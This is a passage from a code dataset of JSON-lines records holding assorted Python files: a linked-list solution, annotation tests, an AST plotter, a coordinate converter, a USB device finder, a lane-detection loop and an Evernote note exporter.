cur.next\n idx += 1\n preEven.next = None\n preOdd.next = dummyEven.next\n return dummyOdd.next\n\n def oddEvenList2(self, head):\n if not head or not head.next:\n return head\n odd, even, evenHead = head, head.next, head.next\n while even and even.next:\n odd.next = odd.next.next\n even.next = even.next.next\n odd = odd.next\n even = even.next\n odd.next = evenHead\n return head\n\n\nhead=ListNode(1)\nhead.next=ListNode(2)\nhead.next.next=ListNode(3)\nhead.next.next.next=ListNode(4)\n\nSolution().oddEvenList2(head)\n\n\n","sub_path":"Odd_Even_Linked_List/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"222199209","text":"from ChildProject.projects import ChildProject, RecordingProfile\nfrom ChildProject.annotations import AnnotationManager\nfrom ChildProject.tables import IndexTable\nimport pandas as pd\nimport numpy as np\nimport os\nimport pytest\nimport shutil\nimport subprocess\nimport sys\n\n@pytest.fixture(scope='function')\ndef project(request):\n if not os.path.exists(\"output/annotations\"):\n project = ChildProject(\"examples/valid_raw_data\")\n project.import_data(\"output/annotations\")\n\n project = ChildProject(\"output/annotations\")\n yield project\n \n os.remove(\"output/annotations/metadata/annotations.csv\")\n shutil.rmtree(\"output/annotations/annotations\")\n os.mkdir(\"output/annotations/annotations\")\n\ndef test_import(project):\n am = AnnotationManager(project)\n\n input_annotations = pd.read_csv('examples/valid_raw_data/raw_annotations/input.csv')\n am.import_annotations(input_annotations)\n am.read()\n \n assert am.annotations.shape[0] == input_annotations.shape[0], \"imported annotations length does not match input\"\n\n assert all([\n os.path.exists(os.path.join(project.path, 'annotations', f))\n for f in am.annotations['annotation_filename'].tolist()\n ]), \"some annotations are missing\"\n\n errors, warnings = am.validate()\n assert len(errors) == 0 and len(warnings) == 0, \"malformed annotations detected\"\n\n for dataset in ['eaf', 'textgrid', 'eaf_solis']:\n annotations = am.annotations[am.annotations['set'] == dataset]\n segments = am.get_segments(annotations)\n segments.drop(columns = annotations.columns, inplace = True)\n\n pd.testing.assert_frame_equal(\n segments.sort_index(axis = 1).sort_values(segments.columns.tolist()).reset_index(drop = True),\n pd.read_csv('tests/truth/{}.csv'.format(dataset)).sort_index(axis = 1).sort_values(segments.columns.tolist()).reset_index(drop = True),\n check_less_precise = True\n )\n\ndef test_intersect(project):\n am = AnnotationManager(project)\n\n input_annotations = pd.read_csv('examples/valid_raw_data/raw_annotations/intersect.csv')\n am.import_annotations(input_annotations)\n am.read()\n\n a, b = am.intersection(\n am.annotations[am.annotations['set'] == 'textgrid'],\n am.annotations[am.annotations['set'] == 'vtc_rttm']\n )\n \n pd.testing.assert_frame_equal(\n a.sort_index(axis = 1).sort_values(a.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at']),\n pd.read_csv('tests/truth/intersect_a.csv').sort_index(axis = 1).sort_values(a.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at'])\n )\n\n pd.testing.assert_frame_equal(\n b.sort_index(axis = 1).sort_values(b.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at']),\n pd.read_csv('tests/truth/intersect_b.csv').sort_index(axis = 
1).sort_values(b.columns.tolist()).reset_index(drop = True).drop(columns=['imported_at'])\n )\n\ndef test_clipping(project):\n am = AnnotationManager(project)\n\n input_annotations = pd.read_csv('examples/valid_raw_data/raw_annotations/input.csv')\n am.import_annotations(input_annotations)\n am.read()\n\n start = 1981\n stop = 1984\n segments = am.get_segments(am.annotations[am.annotations['set'] == 'vtc_rttm'])\n segments = am.clip_segments(segments, start, stop)\n\n assert segments['segment_onset'].between(start, stop).all() and segments['segment_offset'].between(start, stop).all(), \"segments not properly clipped\"\n assert segments.shape[0] == 2, \"got {} segments, expected 2\".format(segments.shape[0])\n\nthresholds = [0, 0.5, 1]\n@pytest.mark.parametrize('turntakingthresh', thresholds)\n@pytest.mark.skipif(tuple(map(int, pd.__version__.split('.')[:2])) < (1,1), reason = \"requires pandas>=1.1.0\")\ndef test_vc_stats(project, turntakingthresh):\n am = AnnotationManager(project)\n am.import_annotations(pd.read_csv('examples/valid_raw_data/raw_annotations/input.csv'))\n\n raw_rttm = 'example_metrics.rttm'\n segments = am.annotations[am.annotations['raw_filename'] == raw_rttm]\n\n vc = am.get_vc_stats(am.get_segments(segments), turntakingthresh = turntakingthresh).reset_index()\n truth_vc = pd.read_csv('tests/truth/vc_truth_{:.1f}.csv'.format(turntakingthresh))\n\n pd.testing.assert_frame_equal(\n vc.reset_index().sort_index(axis = 1).sort_values(vc.columns.tolist()),\n truth_vc.reset_index().sort_index(axis = 1).sort_values(vc.columns.tolist()),\n atol = 3\n )","sub_path":"tests/test_annotations.py","file_name":"test_annotations.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"190851592","text":"import math\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import graphviz_layout\n\nimport py_ast\n\n# import pygraphviz as pgv\n\n\nlabels = {}\nsizes = {}\n\n\ndef travel_tree(ast_g, node: py_ast.Node, dep):\n if node.type == py_ast.Type.ExpVoid:\n return\n ast_g.add_node(node)\n sizes[node] = 1000 / (math.log10(dep) + 1)\n if not node.children:\n labels[node] = node.GetTokenSymbol()\n else:\n labels[node] = node.type.name\n for c in node.children:\n if not c.type == py_ast.Type.ExpVoid:\n ast_g.add_edge(node, c)\n travel_tree(ast_g, c, dep+1)\n\n\nG = nx.DiGraph()\nast_root = py_ast.ParseToken()\ntravel_tree(G, ast_root, 1)\npos = graphviz_layout(G, prog='dot')\nplt.figure(figsize=(16, 9))\nnx.draw(G, pos, alpha=0.3, node_size=list(\n sizes.values()), arrows=True, node_shape='o')\nnx.draw_networkx_labels(\n G, dict(map(lambda x: (x[0], (x[1][0], x[1][1]-15)), pos.items())), labels)\nplt.show()\n","sub_path":"src/parser/py_ast.py","file_name":"py_ast.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"128300258","text":"# 1502. Determine whether an array can form an arithmetic progression https://leetcode.com/problems/can-make-arithmetic-progression-from-sequence/\n\n# arr = list(range(0,100,2))\n# arr = [3,5,1]\n# ans = true\n\narr = [1,2,4]\n# ans = false\n\n# arr.sort() # 1. sorts arr in place 2. returns nothing\n# # so keep using arr directly\n# sorted_arr = sorted(arr) # 1. 
leaves arr unchanged and returns the sorted copy into sorted_arr\n# # so use sorted_arr afterwards\n\n# for i in sorted(arr):\n# print(i)\n\n\nans = True\n\nArr = sorted(arr)\ndiff = Arr[1] - Arr[0]\nfor i in range(len(Arr)-1):\n if (Arr[i+1] - Arr[i]) != diff:\n # print(\"Not an arithmetic progression\")\n ans = False\n break\nif ans:\n print(\"Arithmetic progression\")\nelse:\n print(\"Not an arithmetic progression\")\n","sub_path":"course-8/1502.py","file_name":"1502.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"446082805","text":"from .CoordinateSystemConverter import CoordinateSystemConverter\nfrom .CommonCoordinateSystems import CartesianCoordinates3D, ZMatrixCoordinates\nfrom ...Numputils import vec_norms, vec_angles, pts_dihedrals, dist_deriv, angle_deriv, dihed_deriv\nimport numpy as np\n# this import gets bound at load time, so unfortunately PyCharm can't know just yet\n# what properties its class will have and will try to claim that the files don't exist\n\nclass CartesianToZMatrixConverter(CoordinateSystemConverter):\n \"\"\"\n A converter class for going from Cartesian coordinates to ZMatrix coordinates\n \"\"\"\n\n @property\n def types(self):\n return (CartesianCoordinates3D, ZMatrixCoordinates)\n\n @staticmethod\n def get_dists(points, centers):\n return vec_norms(centers-points)\n @staticmethod\n def get_angles(lefts, centers, rights):\n # need to look up again what the convention is for which atom is the central one...\n v1s = centers-lefts\n v2s = centers-rights\n return vec_angles(v1s, v2s)[0]\n @staticmethod\n def get_diheds(points, centers, seconds, thirds):\n return pts_dihedrals(points, centers, seconds, thirds)\n\n def convert_many(self, coords, ordering=None, use_rad=True, return_derivs=False, **kw):\n \"\"\"\n We'll implement this by having the ordering arg wrap around in coords?\n \"\"\"\n if ordering is None:\n ordering = range(len(coords[0]))\n base_shape = coords.shape\n new_coords = np.reshape(coords, (np.product(base_shape[:-1]),) + base_shape[-1:])\n new_coords, ops = self.convert(new_coords, ordering=ordering, use_rad=use_rad, return_derivs=return_derivs)\n single_coord_shape = (base_shape[-2]-1, new_coords.shape[-1])\n new_shape = base_shape[:-2] + single_coord_shape\n new_coords = np.reshape(new_coords, new_shape)\n if return_derivs:\n ders = ops['derivs']\n # we assume we get a list of derivatives?\n reshaped_ders = [None]*len(ders)\n for i, v in enumerate(ders):\n single_base_shape = (base_shape[-2], new_coords.shape[-1])\n ders_shape = coords.shape + single_base_shape*i + single_coord_shape\n v = v.reshape(ders_shape)\n reshaped_ders[i] = v\n ops['derivs'] = reshaped_ders\n return new_coords, ops\n\n def convert(self, coords, ordering=None, use_rad=True, return_derivs=False, **kw):\n \"\"\"The ordering should be specified like:\n\n [\n [n1],\n [n2, n1],\n [n3, n1/n2, n1/n2],\n [n4, n1/n2/n3, n1/n2/n3, n1/n2/n3],\n [n5, ...],\n ...\n ]\n\n :param coords: array of cartesian coordinates\n :type coords: np.ndarray\n :param use_rad: whether to use radians or not\n :type use_rad: bool\n :param ordering: optional ordering parameter for the z-matrix\n :type ordering: None or tuple of ints or tuple of tuple of ints\n :param kw: ignored key-word arguments\n :type kw:\n :return: z-matrix coords\n :rtype: np.ndarray\n \"\"\"\n ncoords = len(coords)\n orig_ol = ZMatrixCoordinates.canonicalize_order_list(ncoords, ordering)\n ol = orig_ol\n nol = len(ol)\n ncol = len(ol[0])\n fsteps = ncoords / nol\n steps = int(fsteps)\n\n # print(\">> c2z >> ordering:\", ol)\n\n 
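# A plausible canonicalized layout (assumed, for illustration only): with the default\n # ordering for three atoms, ol might look like [[0, -1, -1, -1], [1, 0, -1, -1], [2, 1, 0, -1]],\n # one row per atom as (atom, distance ref, angle ref, dihedral ref).\n 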
multiconfig = nol < ncoords\n if multiconfig:\n ol = ZMatrixCoordinates.tile_order_list(ol, ncoords)\n mc_ol = ol.copy()\n\n # we define an order map that we'll index into to get the new indices for a\n # given coordinate\n om = 1+np.argsort(ol[:, 0])\n\n # need to check against the cases of like 1, 2, 3 atom molecules\n # annoying but not hard\n if return_derivs:\n derivs = [\n np.zeros(coords.shape + (nol-1, 3)),\n np.zeros(coords.shape + (nol, 3) + (nol - 1, 3))\n ]\n if not multiconfig:\n ix = ol[1:, 0]\n jx = ol[1:, 1]\n dists = self.get_dists(coords[ix], coords[jx])\n if return_derivs:\n _dists, dist_derivs, dist_derivs_2 = dist_deriv(coords, ix, jx, order=2)\n drang = np.arange(len(ix))\n derivs[0][ix, :, drang, 0] = dist_derivs[0]\n derivs[0][jx, :, drang, 0] = dist_derivs[1]\n\n for i, x1 in enumerate([ix, jx]):\n for j, x2 in enumerate([ix, jx]):\n # print(i, j, x1, x2,\n # # dist_derivs_2[i, j][0, 0],\n # drang\n # )\n derivs[1][x1, :, x2, :, drang, 0] = dist_derivs_2[i, j]\n\n if len(ol) > 2:\n ix = ol[2:, 0]\n jx = ol[2:, 1]\n kx = ol[2:, 2]\n angles = np.concatenate( (\n [0], self.get_angles(coords[ix], coords[jx], coords[kx])\n ) )\n if not use_rad:\n angles = np.rad2deg(angles)\n if return_derivs:\n _angles, angle_derivs, angle_derivs_2 = angle_deriv(coords, jx, ix, kx, order=2)\n drang = 1+np.arange(len(ix))\n # print(\">>>>\", np.max(np.abs(angle_derivs)))\n derivs[0][jx, :, drang, 1] = angle_derivs[0]\n derivs[0][ix, :, drang, 1] = angle_derivs[1]\n derivs[0][kx, :, drang, 1] = angle_derivs[2]\n\n for i, x1 in enumerate([jx, ix, kx]):\n for j, x2 in enumerate([jx, ix, kx]):\n derivs[1][x1, :, x2, :, drang, 1] = angle_derivs_2[i, j]\n else:\n angles = np.array([0.])\n if len(ol) > 3:\n ix = ol[3:, 0]\n jx = ol[3:, 1]\n kx = ol[3:, 2]\n lx = ol[3:, 3]\n if ol.shape[1] == 5:\n raise NotImplementedError(\"psi angles might be unnecessary\")\n ix = ix.copy()\n jx = jx.copy()\n kx = kx.copy()\n lx = lx.copy()\n fx = ol[3:, 4]\n swap_pos = np.where(fx == 1)\n swap_i = ix[swap_pos]\n swap_j = jx[swap_pos]\n swap_k = kx[swap_pos]\n swap_l = lx[swap_pos]\n ix[swap_pos] = swap_l\n jx[swap_pos] = swap_i\n kx[swap_pos] = swap_j\n lx[swap_pos] = swap_k\n\n diheds = np.concatenate( (\n [0, 0],\n self.get_diheds(coords[ix], coords[jx], coords[kx], coords[lx])\n ) )\n if not use_rad:\n diheds = np.rad2deg(diheds)\n if return_derivs:\n _diheds, dihed_derivs, dihed_derivs_2 = dihed_deriv(coords, ix, jx, kx, lx, order=2)\n drang = 2+np.arange(len(ix))\n derivs[0][ix, :, drang, 2] = dihed_derivs[0]\n derivs[0][jx, :, drang, 2] = dihed_derivs[1]\n derivs[0][kx, :, drang, 2] = dihed_derivs[2]\n derivs[0][lx, :, drang, 2] = dihed_derivs[3]\n\n for i, x1 in enumerate([ix, jx, kx, lx]):\n for j, x2 in enumerate([ix, jx, kx, lx]):\n derivs[1][x1, :, x2, :, drang, 2] = dihed_derivs_2[i, j]\n else:\n diheds = np.array([0, 0])\n ol = ol[1:]\n\n else: # multiconfig\n\n # we do all of this stuff with masking operations in the multiconfiguration cases\n mask = np.repeat(True, ncoords)\n mask[np.arange(0, ncoords, nol)] = False\n ix = ol[mask, 0]\n jx = ol[mask, 1]\n dists = self.get_dists(coords[ix], coords[jx])\n if return_derivs:\n _, dist_derivs, dist_derivs_2 = dist_deriv(coords, ix, jx, order=2)\n drang = np.arange(nol-1)\n nreps = int(len(ix)/(nol-1))\n drang = np.broadcast_to(drang[np.newaxis], (nreps,) + drang.shape).flatten()\n derivs[0][ix, :, drang, 0] = dist_derivs[0]\n derivs[0][jx, :, drang, 0] = dist_derivs[1]\n\n for i, x1 in enumerate([ix, jx]):\n for j, x2 in enumerate([ix, jx]):\n 
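# accumulate the mixed second-derivative block for this (x1, x2) pair of index sets\n 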
derivs[1][x1, :, x2 % nol, :, drang, 0] = dist_derivs_2[i, j]\n\n if nol>2:\n # set up the mask to drop all of the first bits\n mask[np.arange(1, ncoords, nol)] = False\n ix = ol[mask, 0]\n jx = ol[mask, 1]\n kx = ol[mask, 2]\n angles = self.get_angles(coords[ix], coords[jx], coords[kx])\n angles = np.append(angles, np.zeros(steps))\n insert_pos = np.arange(0, ncoords-1*steps-1, nol-2)\n angles = np.insert(angles, insert_pos, 0)\n angles = angles[:ncoords-steps]\n if not use_rad:\n angles = np.rad2deg(angles)\n if return_derivs:\n # we might need to mess with the masks akin to the insert call...\n _, angle_derivs, angle_derivs_2 = angle_deriv(coords, jx, ix, kx, order=2)\n drang = 1+np.arange(nol-2)\n nreps = int(len(ix)/(nol-2))\n drang = np.broadcast_to(drang[np.newaxis], (nreps,) + drang.shape).flatten()\n derivs[0][jx, :, drang, 1] = angle_derivs[0]\n derivs[0][ix, :, drang, 1] = angle_derivs[1]\n derivs[0][kx, :, drang, 1] = angle_derivs[2]\n\n for i, x1 in enumerate([ix, jx, kx]):\n for j, x2 in enumerate([ix, jx, kx]):\n derivs[1][x1, :, x2 % nol, :, drang, 0] = angle_derivs_2[i, j]\n else:\n angles = np.zeros(ncoords-steps)\n\n if nol > 3:\n # set up mask to drop all of the second atom bits (wtf it means 'second')\n mask[np.arange(2, ncoords, nol)] = False\n ix = ol[mask, 0]\n jx = ol[mask, 1]\n kx = ol[mask, 2]\n lx = ol[mask, 3]\n if ol.shape[1] == 5:\n raise ValueError(\"Unclear if there is a difference between tau and psi\")\n ix = ix.copy()\n jx = jx.copy()\n kx = kx.copy()\n lx = lx.copy()\n fx = ol[mask, 4]\n swap_pos = np.where(fx == 1)\n swap_i = ix[swap_pos]\n swap_j = jx[swap_pos]\n swap_k = kx[swap_pos]\n swap_l = lx[swap_pos]\n ix[swap_pos] = swap_l\n jx[swap_pos] = swap_i\n kx[swap_pos] = swap_j\n lx[swap_pos] = swap_k\n # print(ol)\n\n diheds = self.get_diheds(coords[ix], coords[jx], coords[kx], coords[lx])\n # pad diheds to be the size of ncoords\n diheds = np.append(diheds, np.zeros(2*steps))\n\n # insert zeros where undefined\n diheds = np.insert(diheds, np.repeat(np.arange(0, ncoords-2*steps-1, nol-3), 2), 0)\n # take only as many as actually used\n diheds = diheds[:ncoords-steps]\n if not use_rad:\n diheds = np.rad2deg(diheds)\n if return_derivs:\n # Negative sign because my dihed_deriv code is for slightly different\n # ordering than expected\n _, dihed_derivs, dihed_derivs_2 = dihed_deriv(coords, ix, jx, kx, lx, order=2)\n drang = 2+np.arange(nol-3)\n nreps = int(len(ix)/(nol-3))\n drang = np.broadcast_to(drang[np.newaxis], (nreps,) + drang.shape).flatten()\n derivs[0][ix, :, drang, 2] = dihed_derivs[0]\n derivs[0][jx, :, drang, 2] = dihed_derivs[1]\n derivs[0][kx, :, drang, 2] = dihed_derivs[2]\n derivs[0][lx, :, drang, 2] = dihed_derivs[3]\n\n for i, x1 in enumerate([ix, jx, kx, lx]):\n for j, x2 in enumerate([ix, jx, kx, lx]):\n derivs[1][x1, :, x2 % nol, :, drang, 0] = dihed_derivs_2[i, j]\n\n else:\n diheds = np.zeros(ncoords-steps)\n\n # after the np.insert calls we have the right number of final elements, but too many\n # ol and om elements and they're generally too large\n # so we need to shift them down and mask out the elements we don't want\n mask = np.repeat(True, ncoords)\n mask[np.arange(0, ncoords, nol)] = False\n ol = np.reshape(ol[mask], (steps, nol-1, ncol))-np.reshape(np.arange(steps), (steps, 1, 1))\n ol = np.reshape(ol, (ncoords-steps, ncol))\n om = np.reshape(om[mask], (steps, nol-1))-nol*np.reshape(np.arange(steps), (steps, 1))-1\n om = np.reshape(om, (ncoords-steps,))\n\n final_coords = np.array(\n [\n dists, angles, diheds\n ]\n 
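# after the transpose, each row holds the (distance, angle, dihedral) triple for one placed atom\n 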
).T\n\n if multiconfig:\n # figure out what to use for the axes\n origins = coords[mc_ol[1::nol, 1]]\n x_axes = coords[mc_ol[1::nol, 0]] - origins # the first displacement vector\n y_axes = coords[mc_ol[2::nol, 0]] - origins # the second displacement vector (just defines the x-y plane, not the real y-axis)\n axes = np.array([x_axes, y_axes]).transpose((1, 0, 2))\n else:\n origins = coords[ol[0, 1]]\n axes = np.array([coords[ol[0, 0]] - origins, coords[ol[1, 0]] - origins])\n\n ol = orig_ol\n om = om - 1\n if ncol == 5:\n ordering = np.array([\n np.argsort(ol[:, 0]), om[ol[:, 1]], om[ol[:, 2]], om[ol[:, 3]], ol[:, 4]\n ]).T\n else:\n ordering = np.array([\n np.argsort(ol[:, 0]), om[ol[:, 1]], om[ol[:, 2]], om[ol[:, 3]]\n ]).T\n opts = dict(use_rad=use_rad, ordering=ordering, origins=origins, axes=axes)\n\n # if we're returning derivs, we also need to make sure that they're ordered the same way the other data is...\n if return_derivs:\n opts['derivs'] = derivs#[:1]\n\n return final_coords, opts\n\n__converters__ = [ CartesianToZMatrixConverter() ]","sub_path":"McUtils/Coordinerds/CoordinateSystems/CartesianToZMatrix.py","file_name":"CartesianToZMatrix.py","file_ext":"py","file_size_in_byte":14789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"652157015","text":"import re\nimport subprocess\n\nfrom core.dragon import DragonInjector\nfrom data.resources import get_platform_str\n\n\ndef _filter_information(info):\n ret_value = []\n\n for item in info:\n if re.search(\"DRAGONBOOT\", item):\n try:\n injector = DragonInjector(item.split())\n ret_value.append(injector)\n except IOError:\n pass\n\n return ret_value\n\n\ndef find_dragons():\n process = None\n data = None\n filtered_dragons = None\n\n command = get_platform_str(\"command\")\n\n try:\n process = subprocess.run(command, capture_output=True)\n data = process.stdout.decode(\"utf-8\")\n\n # this only affects Windows; str.replace returns a new string,\n # so the result has to be assigned back\n data = data.replace(\"\\r\\n\", \"\\n\")\n split_data = data.split(\"\\n\")\n\n filtered_dragons = _filter_information(split_data)\n except subprocess.TimeoutExpired:\n if process:\n process.kill()\n\n return filtered_dragons\n","sub_path":"source/core/usb.py","file_name":"usb.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"388254402","text":"# Imports\nimport cv2\nfrom pipeline import Pipeline\nfrom Line import Line\n\n# Instantiate utils (calibrates camera)\npipeline = Pipeline()\nright_line = Line(10)\nleft_line = Line(10)\nlines = [left_line, right_line]\ncounter = 0\nmax_lost_frames = 2\nlost_frame = 0\n\n# read video in\nvideo = cv2.VideoCapture('../project_video.mp4')\n# to output video\nfourcc = cv2.VideoWriter_fourcc(*'MP4V')\nout = cv2.VideoWriter('../output_project_video.mp4', fourcc, 20.0, (1280, 720))\n\n# while the video is open, process images\nwhile video.isOpened():\n # read each frame\n success, image = video.read()\n\n # run the pipeline on the frame\n left_line, right_line, result = pipeline.run(image, left_line, right_line)\n\n # see if the line was detected\n if left_line.detected == False or right_line.detected == False:\n # if not add to lost (unusable) frame count\n lost_frame += 1\n else:\n # reset the count, good frame\n lost_frame = 0\n\n # print line information, offset, and lost frame count\n print('lost_frame:', lost_frame,\n 'offset:', left_line.line_base_pos,\n 'left radius:', left_line.radius_of_curvature,\n 'right radius:', 
right_line.radius_of_curvature\n )\n\n # if lost_frame is under the threshold, just pretend like we don't notice it\n if lost_frame < max_lost_frames:\n left_line.detected = True\n right_line.detected = True\n else:\n left_line.detected = False\n right_line.detected = False\n\n # Write the output\n out.write(result)\n # show the frames with the lane marked\n cv2.imshow('frame', result)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideo.release()\nout.release()\ncv2.destroyAllWindows()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"424798030","text":"import os\nimport shutil\nimport csv\nimport math\nimport time\nimport json\nimport copy\nimport mimetypes\n\nfrom optparse import OptionParser\n\nfrom evernote2.api.client import EvernoteClient\nfrom evernote2.edam.notestore.ttypes import NoteFilter, NotesMetadataResultSpec\nfrom evernote2.edam.type.ttypes import NoteSortOrder\nfrom evernote2.edam.error.ttypes import EDAMSystemException, EDAMErrorCode\n\nimport logging\n\n\nenex_file_basename = 'index.enex'\nmeta_file_basename = 'metadata.json'\n\n\ndef main():\n parser = OptionParser()\n\n parser.add_option('-t', '--token', dest='token', help='evernote_api_token')\n parser.add_option('-o', '--output_dir', dest='output_dir', help='dir to save notes', default='./notes-exported')\n parser.add_option('-s', '--sandbox', dest='is_sandbox', help='use sandbox', action='store_true', default=False)\n parser.add_option('-c', '--china', dest='is_china', help='use yinxiang.com instead of evernote.com', action='store_true', default=False)\n parser.add_option('-f', '--force-delete', dest='is_force_delete', help='delete output_dir if exists', action='store_true', default=False)\n parser.add_option('-m', '--max-notes-count', dest='max_notes_count', help='max notes count to download', default='10000')\n parser.add_option('-v', '--verbose', dest='verbose', help='show verbose logs', action='store_true', default=False)\n\n (options, args) = parser.parse_args()\n\n token = options.token\n output_dir = options.output_dir\n is_sandbox = options.is_sandbox\n is_china = options.is_china\n is_force_delete = options.is_force_delete\n max_notes_count = int(options.max_notes_count)\n verbose = options.verbose\n\n if verbose:\n log_level = logging.DEBUG\n else:\n log_level = logging.INFO\n\n logging.basicConfig(level=log_level, format=\"%(asctime)s | %(levelname)s | %(message)s\")\n\n if token is None:\n logging.error('error! 
token is None')\n parser.print_help()\n exit(1)\n\n logging.info('sandbox: %s, china: %s, output_dir: %s' % (\n is_sandbox, is_china, output_dir\n ))\n\n init_output_dir(output_dir, is_force_delete)\n download_notes(token=token, sandbox=is_sandbox, china=is_china, output_dir=output_dir, max_notes_count=max_notes_count)\n\n\ndef init_output_dir(output_dir, is_force_delete):\n # do not raise exception if output_dir exists\n # if os.path.exists(output_dir):\n # if not is_force_delete and len(os.listdir(output_dir)) > 0:\n # raise Exception('%s exists and not exmpty' % output_dir)\n\n if is_force_delete and os.path.exists(output_dir):\n logging.warning('drop dir: %s' % output_dir)\n shutil.rmtree(output_dir)\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ndef download_notes(token, sandbox, china, output_dir, max_notes_count):\n client = EvernoteClient(token=token, sandbox=sandbox, china=china)\n note_store = client.get_note_store()\n\n note_books = note_store.listNotebooks()\n save_notebooks(note_books, output_dir)\n\n note_books_map = {n.guid: n.name for n in note_books}\n\n note_metas = download_metadata(note_store, max_notes_count, note_books_map)\n save_notemetas(note_metas, output_dir)\n\n enex_root = os.path.join(\n output_dir, 'note-enex',\n )\n if not os.path.exists(enex_root):\n os.makedirs(enex_root)\n\n download_all_note_enex(note_store, enex_root, note_metas)\n # total_cnt_notebooks = len(note_books)\n # for nb_idx, notebook in enumerate(note_books):\n # nb_seq = nb_idx + 1\n\n # logging.info('download notebook: (%s/%s) %s' % (nb_seq, total_cnt_notebooks, notebook.name))\n\n\ndef save_notebooks(note_books, output_dir):\n fn = os.path.join(output_dir, 'note_book_meta.csv')\n\n header = [\n 'guid',\n 'name',\n 'stack',\n 'contact',\n ]\n\n with open(fn, 'w') as csvfile:\n csvwriter = csv.writer(csvfile)\n\n csvwriter.writerow(header)\n for notebook in note_books:\n record = [getattr(notebook, i) for i in header]\n csvwriter.writerow(record)\n\n logging.info('%s notebook meta saved in %s' % (len(note_books), fn))\n\n\ndef download_metadata(note_store, max_count, note_books_map):\n batch_cnt = 100\n max_count = max_count or 10000 # ensure valuable default\n\n loops = math.ceil(max_count / batch_cnt)\n metas = []\n\n for i in range(loops):\n offset = i * batch_cnt\n result_list = download_metadata_batch(note_store, offset, batch_cnt)\n\n for idx, note in enumerate(result_list.notes):\n note_meta = {\n # 'idx': offset + idx + 1,\n 'guid': note.guid,\n 'title': note.title,\n 'contentLength': note.contentLength,\n 'created': note.created,\n 'updated': note.updated,\n 'updateSequenceNum': note.updateSequenceNum,\n 'tagGuids': note.tagGuids,\n 'notebookGuid': note.notebookGuid,\n 'notebookName': note_books_map[note.notebookGuid],\n 'attrAuthor': note.attributes.author,\n 'attrSource': note.attributes.source,\n 'attrSourceURL': note.attributes.sourceURL,\n 'attrSourceApplication': note.attributes.sourceApplication,\n 'attrShareDate': note.attributes.shareDate,\n # 'attributes': note.attributes,\n # 'largestResourceMime': note.largestResourceMime,\n # 'largestResourceSize': note.largestResourceSize,\n }\n metas.append(note_meta)\n\n if len(result_list.notes) < 100:\n break\n\n return metas[:max_count]\n\n\ndef download_metadata_batch(note_store, offset=0, batch_cnt=100):\n # note is an instance of NoteMetadata\n # result_list is an instance of NotesMetadataList\n\n updated_filter = NoteFilter(order=NoteSortOrder.UPDATED)\n result_spec = NotesMetadataResultSpec(\n 
includeTitle=True,\n includeContentLength=True,\n includeCreated=True,\n includeUpdated=True,\n includeUpdateSequenceNum=True,\n includeNotebookGuid=True,\n includeTagGuids=True,\n includeAttributes=True,\n # includeLargestResourceMime=True,\n # includeLargestResourceSize=True,\n )\n\n result_list = note_store.findNotesMetadata(updated_filter, offset, batch_cnt, result_spec)\n\n return result_list\n\n\ndef save_notemetas(note_metas, output_dir):\n fn = os.path.join(output_dir, 'note_meta.csv')\n\n fieldnames = [\n 'guid',\n 'title',\n 'contentLength',\n 'created',\n 'updated',\n 'updateSequenceNum',\n 'tagGuids',\n 'notebookGuid',\n 'notebookName',\n 'attrAuthor',\n 'attrSource',\n 'attrSourceURL',\n 'attrSourceApplication',\n 'attrShareDate',\n ]\n\n with open(fn, 'w') as csvfile:\n csvwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n csvwriter.writeheader()\n for record in note_metas:\n csvwriter.writerow(record)\n\n logging.info('%s note metas saved in %s' % (len(note_metas), fn))\n\n\ndef download_all_note_enex(note_store, enex_root, note_metas):\n total_cnt = len(note_metas)\n\n new_cnt = 0\n\n for idx, meta in enumerate(note_metas):\n title = meta['title']\n guid = meta['guid']\n note_dir = os.path.join(\n enex_root, 'note-%s' % guid)\n\n text_file = os.path.join(note_dir, enex_file_basename)\n\n if os.path.exists(text_file):\n logging.debug('(%s/%s) skip download since exists: %s, %s' % (\n idx + 1, total_cnt, text_file, title))\n continue\n\n # download if not exists\n downloaded = False\n while not downloaded:\n try:\n download_one_note_enex(note_store, note_dir, guid, note_meta=meta)\n except EDAMSystemException as e:\n if e.errorCode == EDAMErrorCode.RATE_LIMIT_REACHED:\n duration = e.rateLimitDuration\n logging.info('Rate limit reacheded, sleep %s seconds and retry' % duration)\n time.sleep(duration)\n else:\n downloaded = True\n logging.info('(%s/%s) saved: %s, %s' % (idx + 1, total_cnt, note_dir, title))\n\n new_cnt += 1\n\n logging.info('%s new notes downloaded' % new_cnt)\n\n\ndef download_one_note_enex(note_store, note_dir, note_guid, note_meta):\n \"\"\"\n\n notes:\n\n save `enex_file_basename` at the end of all,\n so that we can check this file to know if the cache is good when resume running\n \"\"\"\n note = note_store.getNote(\n note_guid,\n True, # withContent=True,\n True, # withResourcesData=True,\n False, # withResourcesRecognition=False,\n False, # withResourcesAlternateData=False,\n )\n\n content = note.content # string\n contentHash = note.contentHash # string\n contentHashHex = bytes.hex(contentHash)\n contentLength = note.contentLength # i32\n # notebookGuid = note.notebookGuid\n # tagGuids = note.tagGuids # list\n tagNames = note.tagNames # List\n resources = note.resources # list\n\n # build metadata structure\n metadata = copy.deepcopy(note_meta)\n metadata['contentHashHex'] = contentHashHex\n 